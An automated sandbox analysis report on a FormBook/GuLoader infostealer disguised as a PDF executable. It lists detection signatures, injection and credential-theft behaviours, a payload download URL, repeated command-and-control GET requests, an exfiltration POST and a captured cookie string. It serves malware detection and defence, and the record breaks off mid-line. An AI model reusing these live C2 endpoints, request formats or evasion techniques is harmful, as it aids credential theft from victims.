Windows Analysis Report
BM-FM_NR.24040718PDF.exe

Overview

General Information

Sample name: BM-FM_NR.24040718PDF.exe
Analysis ID: 1430949
MD5: 7206084219e20fe7575aec63a3422a5c
SHA1: 930508090c6ec226838189c1d6ca32035c2ac0ed
SHA256: 3fb935f3b274dddf25a926967ceb573ad0f990bff966583157849545c60c42e4
Infos:

Detection

FormBook, GuLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: BM-FM_NR.24040718PDF.exe Virustotal: Detection: 12% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Uses 32bit PE files
Source: BM-FM_NR.24040718PDF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 37.251.143.215:443 -> 192.168.11.20:50244 version: TLS 1.2
Source: BM-FM_NR.24040718PDF.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: write.pdbGCTL source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: write.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, write.exe
Source: Binary string: mshtml.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00406033 FindFirstFileA,FindClose, 0_2_00406033
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004055D1
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDB810 FindFirstFileW,FindNextFileW,FindClose, 5_2_02FDB810
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\write.exe Code function: 4x nop then xor eax, eax 5_2_02FC92D0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 84.32.84.32 84.32.84.32
Source: Joe Sandbox View IP Address: 64.190.62.22 64.190.62.22
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /calitateX/lUMnxNJflRDqoVSbz65.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: absorbante-calitate.roCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.arilyfarlico.ruUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.donantedeovulos.spaceUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kader42.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.noispisok.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kansaiwoody.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.a-two-spa-salon.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.techfun.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=OmGyc5P3HC4gilwd2aY8392rI7ekMFe8/FNw83qBYcD4CWN3uhWBPhzZSt3lBo5o5sC5ats8mUsRdTFftG6L4VjYphbRhm0WEo/D3mWtey64RraPnZAfyak= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ogunlewefamily.org.ngUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.387mfyr.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=gPmRQJtWqOniEM4QRYssNN1Z+6d7UeIsnmjN3YDy8B2ChygMtzhOiKO2U7rNAXgtrRM7pNM3lf9QxBLsAyZPQtIaU4REtcvgBDtZA8Dv/AhV5YtMj725a40= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.nurenose.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=PHd15HH4KfPc0usCsZkSxG972lDJtR4Pjc4etW3YVFy3SYU2ewDgVW1TagnS2dO7KixciWH8BWdXpsVg20loSBMgq1tvcXpNFyUGPl5UEoDw0JtEo5FA5Us=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.lm2ue.usUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=1MJjEON/uhpbuDEqbkHBFEkwk/hMmapOQ6TXfH8Ig3o6kyo9vDLLjAAJ58FhZwMWBw3WEeqXS0siPV8x1sARUVUsjrzf4e0UfFtBtuYJdiL+lQFlVX0tNTo=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.whjzff.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.arilyfarlico.ruUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.donantedeovulos.spaceUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kader42.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.noispisok.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kansaiwoody.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.a-two-spa-salon.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.techfun.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=fnwN1v/cGsL5Viy/xGPo7bu3BFyPSCGRcDxJWuOrmZaTk6+QfBJJ6K85NdT8x6wg+kdjGkUCY343uxqa5Yt4yEVQtg3mZjTzeLq2Z0Ov3khzfcaVVj80n48=&ad64=U4M8cbh8kd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.concretedailypress.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&ad64=U4M8cbh8kd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.387mfyr.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.arilyfarlico.ruUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.donantedeovulos.spaceUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kader42.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.noispisok.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kansaiwoody.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.a-two-spa-salon.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.techfun.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: asoFfnDVnWYESbbZcbazpTYkAQVO.exe, 00000006.00000002.17956910913.0000000002522000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
Source: unknown DNS traffic detected: queries for: absorbante-calitate.ro
Source: unknown HTTP traffic detected: POST /8cgp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0Content-Length: 202Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.donantedeovulos.spaceOrigin: http://www.donantedeovulos.spaceReferer: http://www.donantedeovulos.space/8cgp/User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0Data Raw: 58 68 39 6c 58 3d 35 70 6d 4c 4e 34 38 67 4b 72 45 66 36 4b 54 6e 48 47 66 31 4b 78 4f 59 6a 64 77 79 70 2b 53 63 65 51 37 4a 34 34 67 4c 41 6b 52 32 42 52 61 6a 33 5a 66 42 63 56 38 43 4b 56 45 46 6d 51 43 42 38 33 52 78 2f 6f 39 39 62 37 47 75 39 72 46 61 6b 67 6f 5a 55 4d 6d 4f 32 63 49 39 36 69 7a 39 36 41 64 2f 6e 55 53 61 59 5a 51 30 6e 38 70 66 6f 4b 57 49 48 50 2b 68 4d 4d 71 75 4f 78 6d 43 66 76 64 69 33 7a 2b 33 68 6e 6a 54 76 47 45 65 63 70 6f 79 69 30 4b 2b 44 59 72 51 51 57 6e 58 6a 6e 4f 48 30 4b 79 49 32 78 59 6c 42 7a 4e 4b 57 43 30 6c 71 68 4e 71 2b 78 4f 30 4c 50 39 71 34 67 3d 3d Data Ascii: Xh9lX=5pmLN48gKrEf6KTnHGf1KxOYjdwyp+SceQ7J44gLAkR2BRaj3ZfBcV8CKVEFmQCB83Rx/o99b7Gu9rFakgoZUMmO2cI96iz96Ad/nUSaYZQ0n8pfoKWIHP+hMMquOxmCfvdi3z+3hnjTvGEecpoyi0K+DYrQQWnXjnOH0KyI2xYlBzNKWC0lqhNq+xO0LP9q4g==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:23 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 